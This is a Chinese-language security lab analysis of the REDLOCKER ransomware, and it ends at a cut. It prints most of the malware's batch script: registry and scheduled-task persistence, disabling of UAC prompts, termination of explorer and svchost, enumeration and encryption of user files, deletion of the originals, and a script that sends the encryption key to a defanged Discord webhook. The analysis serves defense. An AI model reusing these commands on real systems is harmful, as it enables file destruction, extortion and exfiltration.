近日,亚信安全网络实验室截获了一款破坏MBR的新型勒索病毒REDLOCKER,该病毒通过网络下载感染本机,到达系统后释放两个组件,其中一个组件是脚本文件,其采用RC4加密算法加密文件,并释放MBR破坏程序,导致用户系统重启后显示黑客留下的信息,无法进入系统。另外一个文件为工具集,提供了RC4加密,AES加密等功能,由脚本文件进行调用。亚信安全将该勒索命名为Ransom.Win32.REDLOCKER.YCBCQ。
样本启动后从自身资源节中导出数据,在%temp%目录创建2个病毒组件:
执行生成的批处理文件1c04.bat(该文件名为随机命名,本文以1c04.bat为例,进行分析):
将病毒母体文件变为“只读”属性。
Attrib +R %0
将病毒母体添加到开机自启动。
Copy /b /y %0 “%appdata%\Microsoft\Windows\Start Menu\Programs\Startup”
结束“文件资源管理器”和“系统服务”。
Taskkill /im explorer.exe /f
Taskkill /im svchost.exe /f
设置注册表自启动项目。
REG
ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Payload"
/t REG_SZ /d "powershell.exe start -verb runas '"%0"' am_admin
-WindowStyle hidden" /f>nul
建立EXE文件关联,每次双击EXE文件时都会运行此病毒母体文件。
REG ADD "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d "%0 %%1 %%*" /f
阻止用户使用“我的电脑”来访问所选驱动器的内容。
从“我的电脑”和Windows资源管理器中删除代表所选驱动器的图标。此外,代表所选驱动器的驱动器号也不会出现在标准“打开”对话框中。
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewonDrive" /t REG_DWORD /d 12 /f>nul
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDrives" /t REG_DWORD /d 12 /f>nul
解密文件finalwords.exe 并设置开机启动。
certutil -decode finalwords.tmp finalwords.exe
schtasks
/create /SC ONEVENT /RU "SYSTEM" /EC System /TN InstantKill /TR
"powershell.exe start -verb runas %cd%\finalwords.exe" /RL HIGHEST /MO
*[System\EventID=6005] /F>Nul
禁用安全桌面提示;
允许执行需要提升到管理员的操作,而无需征得同意或凭据;
当程序尝试对计算机进行更改时,Windows 会通知用户。
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f
设置键盘映射代码屏蔽按键 (左右ALT键等)。
REG
ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v
"Scancode Map" /t REG_BINARY /d
"00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000"
/f /reg:64 > nul
调用程序:extd.exe生成5个随机字符进行合并存入变量randomletter。
将%temp%文件夹及其子文件夹中的文件加上“只读”、“系统文件”和“隐藏”属性。
attrib +r +s +h /S /D %temp%
切换到用户文件夹目录,然后枚举出此目录及其子目录指定后缀的文件列表,并保存到文件pathhost中。
cd /D %HOMEDRIVE%\Users\
dir
/s /b | findstr /I /R "db exe bat doc docx xls ppx txt css html jpg eps
ppt png pdf rar avi zip raw jpeg mp3 wav wma tar epub azw ibook img ani
bfc blg cat cer cfg ini part prt 1 2 3 cur cpl crl crt dat db der dll
dsn ds dun fnd fng fon font hlp grp isp ins inf key lnk ink msc msi msp
msstyles nfo ocx otf p7c pif pm pnf psw qds rdp reg scr sct shs sys
theme tmp ttc ttf wav wmdb wme wsc wsf wsh aif aifc aiff adf amf mid mi
di miz mp1 mp2 mp3 mtm ogg ogm ra rmi snd stm stz vox wax wm wma wmv ace
arj bz bz2 cab gz ha lha lzh r0 tbz tbz2 tgz uu uue zoo xxe bmp bw cdt
cpt cgm dcx dib emf gbr gif gih ico iff ilbm jfif jif jpe lbm mac pict
pct pic pcx pix pntg psd psp qtif qti rgb rgba tga tif tiff wmf dic diz
dochtml hta exc log idx pdf rtf s cp wri wtx pps ppa pothtml ppthtml dot
dothtml csv dqy xl asx wvx wm ctt ymg yps asp htm htt js jse jsp mht
mhtml php shtm url xml xsl eml mbx msg bin class c h cpp java jar m3u
vbs spl swf c++ csharp c# ppsx ps1 shb docm odt svg webp
heic">pathhost
将枚举出的文件添加“只读”、“系统文件”和“隐藏”属性。
attrib +r +s +h pathhost
读取文件列表中的每一个文件,并使用Base64加密,然后使用生成的随机字符作为密钥,对Base64加密后的文件使用RC4算法加密。删除加密中间文件。
for /f %%a in (pathhost) do (
certutil -f -encode %%a %%a
%extd% /aesencode %%a %%a.a %randomletter%
%extd% /rc4 %%a %%a.aa %randomletter%
del /f /s /q %%a
del /f /s /q %%a.a)
对所有aa后缀结尾的文件添加“只读”属性。
attrib +r *.aa /S
将密钥发送到黑客服务器。
set str=var request = new XMLHttpRequest();
set
str2=request.open("POST",
"hxxps[:]//discord[.]com/api/webhooks/803443573722710047/DHTqigSoy72GqbbicAGvijeiMetfkvr8QL0UV
yVIbp-4tehVd6_cnFln19Z4Ro5R76Ci");
set str3=request.setRequestHeader('Content-type', 'application/json');
set str4=var params = {
set str5=username: "",
set str6=avatar_url: "",
set str7=content: "%randomletter%"}
set str8=request.send(JSON.stringify(params));
echo %str%>ThreadSender.js
echo %str2%>>ThreadSender.js
echo %str3%>>ThreadSender.js
echo %str4%>>ThreadSender.js
echo %str5%>>ThreadSender.js
echo %str6%>>ThreadSender.js
echo %str7%>>ThreadSender.js
echo %str8%>>ThreadSender.js
start ThreadSender.js
User-Agent:UFTUEDQSQYYNQUPDZWPRJLCCXDDNLLWZURL: hxxp://doggofallingwater[.]000webhostapp[.]com/logger.php
由于MBR被覆盖,系统重启后显示黑客写入的信息,系统无法正常启动。
该文件是一个工具集,提供许多实用功能,如:AES加密、AES解密、RC4加密、判断系统版本、判断系统语言、文件下载等。所有功能列表如下: